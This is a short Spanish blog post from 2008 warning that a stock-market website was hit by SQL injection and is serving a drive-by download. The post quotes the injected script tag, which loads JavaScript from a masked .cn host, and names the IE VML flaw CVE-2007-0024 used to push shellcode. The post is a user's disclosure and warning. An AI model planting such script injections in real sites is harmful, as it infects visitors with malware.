May 12 2008
Inyección SQL!!!
Desde luego que desfachatez, he intentado acceder a la página de Bolsa a la que siempre me conecto para ver si ya se había hundido el planeta y me encuentro que me están intentando meter un troyano…
Por lo que sé la página de xXx.com,ha sufrido una inyección SQL y está infectando usuarios descuidados. El problema reside en el listado de su Ranking Ibex, todos los valores presentes han sufrido una pequeña modificación y en vez de mostrar sólo el nombre y un enlace al valor, están enviando el siguiente script a todos los usuarios: <script src=http://www.w<script src=http://www.******.cn/m.js></script>
Es posible que estén infectando a todos los usuarios que usen explorer 5, 6 y 7 y no tengan parcheado su Windows XP SP2, 2003 SP1, 2003, 2000 SP4. Por lo que he leído el fallo es de carácter grave. En la página del National Vulnerability Database explican algo más sobre el fallo y sus consecuencias. El tag es CVE-2007-0024.
Ese script lo que hace es la carga de la página http://www.***.cn/07004.htm, que nos intentan meter un shellcode via este schemas-microsoft-com:vml.
En mi caso fue el antivirus (Avast) el que me dijo que se intentaba ejecutar un
En la página de F-Secure tienen más información.
[...] visito. Via M$ y esos admins que no han parcheado un fallo de seguridad de nivel alto. Más info: enikei.com/2008/05/12/inyeccion-sql/ Sé que es autobombo y lo siento pero no hay muchas referencias en internet salvo página de [...]